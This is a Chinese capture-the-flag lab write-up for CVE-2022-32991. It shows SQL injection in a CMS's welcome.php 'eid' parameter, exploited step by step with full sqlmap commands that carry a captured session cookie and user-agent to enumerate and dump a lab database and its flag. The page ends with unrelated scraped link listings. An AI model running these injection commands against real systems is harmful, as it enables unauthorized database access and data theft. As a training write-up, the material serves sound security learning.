目录

前期准备

工具

渗透测试

靶场提示

靶场实战

0x01 访问路径

0x02 注册用户并登入

0x03 url存在注入点

0x04 获取cookie和user-agent

0x05 sqlmap爆破

前期准备

工具

1.Burpsuite(对应java环境)

2.Sqlmap(对应python环境)

渗透测试

靶场提示

该CMS的welcome.php中存在SQL注入攻击

靶场实战

0x01 访问路径

0x02 注册用户并登入

0x03 url存在注入点

官方有提示:该CMS的welcome.php中存在SQL注入攻击。发现注入点。

0x04 获取cookie和user-agent

这存在两种方法,获取cookie是为了绕过身份验证,user-agent和random-agent主要是为了绕过客户端认证,否则容易被安全机制拦截。

方法一:抓包

点击第一个进去之后抓包

网页设置好代理->burpsuite设置代理->刷新页面

方法二:鼠标右键->检查->网络-> 刷新->找到第一个包,查看cookie和user-agent。

获取信息

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56
​
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669169499

0x05 sqlmap爆破

验证是否存在注入

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch

爆破数据库

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch --dbs

爆破表

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf --tables

爆破列

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf -T flag --columns

爆破字段

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf -T flag -C flag --dump

0x06 获得flag

 flag{e9dd7838-f6fe-4adf-a2a3-e7a49ed92a91}

总结

本次靶场主要考察的是对sql注入的用法,运用了一些sqlmap的参数对安全机制的绕过。

-p                       指定注入的参数
--batch                  使用默认方法去执行sql注入
--random-agent           随机更换请求头
--user-agent             使用指定的请求头
--cookie                 使用指定cookie

[春秋云镜] CVE-2022-32991 靶场详解相关推荐

  1. xss-labs靶场实战全通关详细过程(xss靶场详解)

    目录 level 1 level 2 level 3 level 4 level 5 level 6 level 7 level 8 level 9 level 10 level 11 level 1 ...

  2. upload-labs-master文件上传漏洞靶场详解(1-17)

    目录 前言 pass-01 pass-02 pass-03 pass-04 pass-05 pass-06 pass-07 pass-08 pass-09 pass-10 pass-11 pass-1 ...

  3. Pikachu靶场之文件包含漏洞详解

    Pikachu靶场之文件包含漏洞详解 前言 文件包含漏洞简述 1.漏洞描述 2.漏洞原因 3.漏洞危害 4.如何防御 第一关 File Inclusion(local) 1.尝试读取"隐藏& ...

  4. XSS靶场prompt.ml过关详解

    XSS靶场prompt.ml过关详解 前言 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0A 0x0B 0x0C 0x0D 0x0E 0x0 ...

  5. Pikachu靶场之越权漏洞详解

    Pikachu靶场之越权漏洞详解 前言 逻辑越权漏洞简述 漏洞描述 漏洞原因 漏洞分类 水平越权 垂直越权 权限框架缺陷 如何防御 第一关 水平越权 问题分析 尝试防御 第二关 垂直越权 问题分析 尝 ...

  6. [杨可桢]机械设计基础题库 机械设计基础习题 2022机械设计基础考试题答案 杨可桢《机械设计基础》(第7版)笔记和课后习题(含考研真题)详解

    [杨可桢]机械设计基础题库  机械设计基础习题  2022机械设计基础考试题答案-硕达学习网 杨可桢<机械设计基础>(第7版)笔记和课后习题(含考研真题)详解 目录 第1章 平面机构的自由 ...

  7. 2022年全国大学生数学建模竞赛E题目-小批量物料生产安排详解+思路+Python代码时序预测模型(三)

    目录 前言 一.六种物料挑选 二.周数处理 三.时序预测模型 模型预测结果 建模的部分后续将会写出,想要了解更多的欢迎加博主微信,免费获取更多细化思路+模型! 点关注,防走丢,如有纰漏之处,请留言指教 ...

  8. 2022美亚杯第八届中国电子数据取证大赛-个人赛write up详解,软件就用弘连和美亚,尽量写的细致一点。建议入门看,仅为了解题,没有专业精神。专业选手去看后面推荐的两篇解析,都是大佬。

    建议新手看我的博客,比较简单粗暴,解题率较低,仅仅是为了比赛,入门的同学可以看看.我的水平还很糟糕,之后会努力学习,所以这篇博客也会不断修改完善.博客还有很多不当之处,如有发现不当之处请私信我,我会做 ...

  9. 2022年亚太数学建模竞赛-问题C:全球变暖与否?-思路详解

    一.题目分析 数据分析典中典,数据量适中,主要考察预测模型,另外还需要收集额外的数据辅助建模和判断. 要求 1.你同意全球气温的说法吗?使用2022_APMMC_C_Data.csv以及您的团队收集的 ...

最新文章

  1. 劝你别把开源的AI项目写在简历上了!!!
  2. 大话中文文本分类之TextRNN
  3. 计算机二叉树讲解ppt,数据结构二叉树.ppt
  4. linux如何右键新建文件夹,在Ubuntu 18.04右键菜单中增加新文档(New Document)及其他类型选项...
  5. 在虚拟主机中无法实现缩放等交互
  6. Linux下使用PPTP ×××拔号的实现
  7. 华为网赛云数据中心基础原理自测答案
  8. Skin设计小组新作品发布—绿草蓝天
  9. windows下二进制mysql的卸载以及安装教程
  10. python中赋值不正确的_python中关于赋值、浅拷贝与深拷贝的问题
  11. java更改包名称_更改Java包名称如何改变我的系统架构
  12. html未点击背景 点击背景,在AngularJs中点击状态如何改变背景色
  13. 关于RSS技术 和应用
  14. launchpad乐器_请把《明日之子》里徐洋称为哆啦A洋,还有什么乐器是你不会的?...
  15. 深度学习图像预处理——分类
  16. mscoco数据集_caffe详解之数据层
  17. AC自动机(python)
  18. 何为企业?何以“大而能用,大而有当”?|一点财经
  19. 《前沿》(Frontiers)系列英文学术期介绍
  20. 关闭/开启“此电脑”左边的导航栏win10

热门文章

  1. 【解决方法】chrome和edge浏览器出现“你的连接不是专用连接“的问题
  2. 不知道自己不知道 知道自己不知道 不知道自己知道 知道自己知道
  3. HSPC氢化大豆磷脂酰胆碱CAS92128-87-5
  4. 优秀的软件词典灵格斯
  5. 基于微信小程序的学生选课系统源码
  6. 笔记本电脑计算机无法启动怎么办,联想笔记本开不了机怎么办 电脑开机进不了系统怎么办...
  7. json tobean
  8. 阅读笔记《Changer: Feature Interaction is What You Need for Change Detection》
  9. Cocos Creator 微信小游戏 填坑记录
  10. 『十年树木 百年树人』最好的机会AI最牛的你!